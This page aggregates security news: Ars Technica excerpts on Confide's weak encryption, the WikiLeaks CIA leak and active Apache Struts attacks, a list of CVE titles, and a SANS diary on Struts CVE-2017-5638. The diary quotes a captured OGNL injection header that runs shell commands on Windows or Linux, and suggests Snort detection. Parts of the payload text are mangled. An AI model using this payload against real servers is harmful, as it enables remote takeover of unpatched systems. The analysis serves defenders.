(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
 
OneThird CMS CVE-2017-2123 Cross Site Scripting Vulnerability
 

Enlarge (credit: Confide)

A pair of damning advisories independently published Wednesday raise serious questions about the security assurances of Confide, a messaging app that's billed as providing "battle tested, military grade" end-to-end encryption and is reportedly being used by individuals inside the US government.

One of the bulletins, published by security firm Quarkslab, warned that current versions of Confide—including those available for Macs, PCs, iPhones, Android devices, and Apple Watches—don't provide true end-to-end encryption at all, at least as that term is commonly defined. Unlike competing secure messaging app Signal—which prevents even authorized insiders from accessing the keys needed to decrypt messages—Confide engineers, or people who hack the Confide service, can easily create keys that can be used to decrypt messages as they're sent in real time.

Quarkslab researcher Jean-Baptiste Bédrune tested Confide and found that the main encryption layer protecting messages in transit is transport layer security (TLS), a protocol that's trivial for authorized people inside Confide to turn off. TLS has faced its share of bypass hacks over the more than two decades it has been in use. In Wednesday's post Bédrune wrote:

Read 11 remaining paragraphs | Comments

 

Enlarge / Julian Assange in his video press conference on Periscope on March 9.

The WikiLeaks selective dump of internal files from the CIA's espionage software development organization was accompanied by a press release from Julian Assange that went full-throttle on the dire nature of the CIA's hacking tools. While the documents themselves provide context that contradicts some of Assange's hype, there is certainly a major cause for concern that comes along with the press release: Assange claims that the CIA's tools are being shared "out of control" and may already be in use for nefarious purposes.

In a video statement on Periscope today, Assange asserted that the CIA "lost control of its entire cyber-weapons arsenal. Now, this is a historic act of devastating incompetence to have created such an arsenal and stored it all in one place and not secured it." Assange repeated the claim that WikiLeaks had stumbled upon the archive "as the result of it being passed around a number of different members of the US intelligence community out of control in unauthorized fashion."

When Assange released the first wave of documents, from what is apparently a recent archive from an internal CIA developer collaboration server, he did a number of things that WikiLeaks hasn't done in the past. Perhaps in response to some of the criticism leveled against WikiLeaks from others—including NSA whistleblower Edward Snowden—Assange and WikiLeaks largely redacted personal details of CIA employees from the dump. The group also held back the archives of the tools themselves (publishing instead text files with a list of the archives' contents). Assange has taken the position that this leak is primarily about protecting computer users around the world from the use of the tools that are part of the leak. He also insinuated WikiLeaks had evidence that the CIA spied on US citizens—or at least had implants on systems with US IP addresses.

Read 5 remaining paragraphs | Comments

 
Google Android libgdx CVE-2017-0477 Remote Code Execution Vulnerability
 
Google Android Framesequence Library CVE-2017-0478 Remote Code Execution Vulnerability
 
IBM Content Navigator CVE-2017-1146 Cross Site Scripting Vulnerability
 
IBM Tivoli System Automation for Multiplatforms Local Privilege Escalation Vulnerability
 
HP Intelligent Management Center CVE-2017-5790 Remote Code Execution Vulnerability
 
Google Android AOSP Messaging CVE-2017-0476 Memory Corruption Vulnerability
 
wuhu CVE-2017-6544 Cross Site Scripting Vulnerability
 
libevent Multiple Security Vulnerabilities
 
Linux kernel CVE-2017-6346 Use After Free Local Denial of Service Vulnerability
 
Linux kernel CVE-2017-6345 Local Denial of Service Vulnerability
 
Linux Kernel CVE-2017-2636 Local Privilege Escalation Vulnerability
 
Multiple D-Link Routers CVE-2017-3193 Stack Buffer Overflow Vulnerability
 
IBM Jazz Reporting Service CVE-2015-7464 Denial of Service Vulnerability
 
Nessus Arbitrary File Upload Vulnerability
 
Pharos PopUp Printer Client Multiple Heap Based Buffer Overflow Vulnerabilities
 
Pharos PopUp Printer Client CVE-2017-2787 Heap Based Buffer Overflow Vulnerability
 
Drupal Services Module Remote Code Execution Vulnerability
 
Google Android Qualcomm Camera Driver Multiple Information Disclosure Vulnerabilities
 
Oracle Java SE and JRockit CVE-2017-3252 Remote Security Vulnerability
 
Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
 
Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
 
Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
 
Google Android NVIDIA GPU Driver Multiple Privilege Escalation Vulnerabilities
 
Google Android MediaTek Components Multiple Privilege Escalation Vulnerabilities
 

Enlarge / One of two publicly available exploits for a critical Apache Struts vulnerability. (credit: Kevin Beaumont)

In a string of attacks that have escalated over the past 48 hours, hackers are actively exploiting a critical vulnerability that allows them to take almost complete control of Web servers used by banks, government agencies, and large Internet companies.

The code-execution bug resides in the Apache Struts 2 Web application framework and is trivial to exploit. Although maintainers of the open source project patched the vulnerability on Monday, it remains under attack by hackers who are exploiting it to inject commands of their choice into Struts servers that have yet to install the update, researchers are warning. Making matters worse, at least two working exploits are publicly available.

"If you run it against a vulnerable application, the result will be the remote execution of commands with the user running the server," Vicente Motos wrote of one of the exploits in a post published late Wednesday afternoon on the Hack Players website. "We have dedicated hours to reporting to companies, governments, manufacturers, and even individuals to patch and correct the vulnerability as soon as possible, but the exploit has already jumped to the big pages of 'advisories,' and massive attempts to exploit the Internet have already been observed."

Read 8 remaining paragraphs | Comments

 

On Monday, Apache released a patch for the Struts 2 framework [1]. The patch fixes an easy to exploit vulnerability in the multipart parser that is typically used for file uploads. A Metasploit module was released that same day, and some readers reported seeing already exploit attempts in the wild.

You should be running Struts 2.3.32 or 2.5.10.1. All prior versions are vulnerable.

Struts 2 is a Java framework that is commonly used by Java-basedweb applications. It is also knowns as Jakarta Struts and Apache Struts. The Apache project currently maintains Struts.

The vulnerability allows an attacker to include code in the Content-Type +http://www.baidu.com/search/spider.html..
Content-Type: %{(#nike=multipart/form-data).([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=echo \587d7b356191903a8ff327f548766288\).(#iswin=(@[email protected](os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Referer: http://linux.cn/
Accept-Language: zh-cn
Content-Length: 0
Host: [removed]
Connection: Keep-Alive

Yes... the content type header is quite long. About 800 bytes. It should be easy to catch these exploit attempts with Snort by just setting the max_header_length parameter in the http_inspect preprocessor. I havent tried it yet, but setting this to 500 should work fine (the default is 750, which should work too).

Snort.org included a rule in Tuesdays subscriber update.

The exploit should work on Windows and Linux. It tests which operating system it runs on via @[email protected](os.name). It it runs on Windows, then it will execute cmd.exe /c followed by a command (highlighted in red in aboves sample). One Unix, it will execute /bin/bash -c followed by the same command.

Commands I have seen so far:

Simple vulnerability checks:

echo Struts2045
echo \587d7b356191903a8ff327f548766288\
(Virustotal identifies this as a generic backdoor. Seehttps://www.virustotal.com/en/file/db98788729f4810f64f9ff7b279dd69ef47942b87fc259fefc56e30f3aedb171/analysis/ )

Packet capture of the exploit running against a lab system

[1]https://cwiki.apache.org/confluence/display/WW/S2-045

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status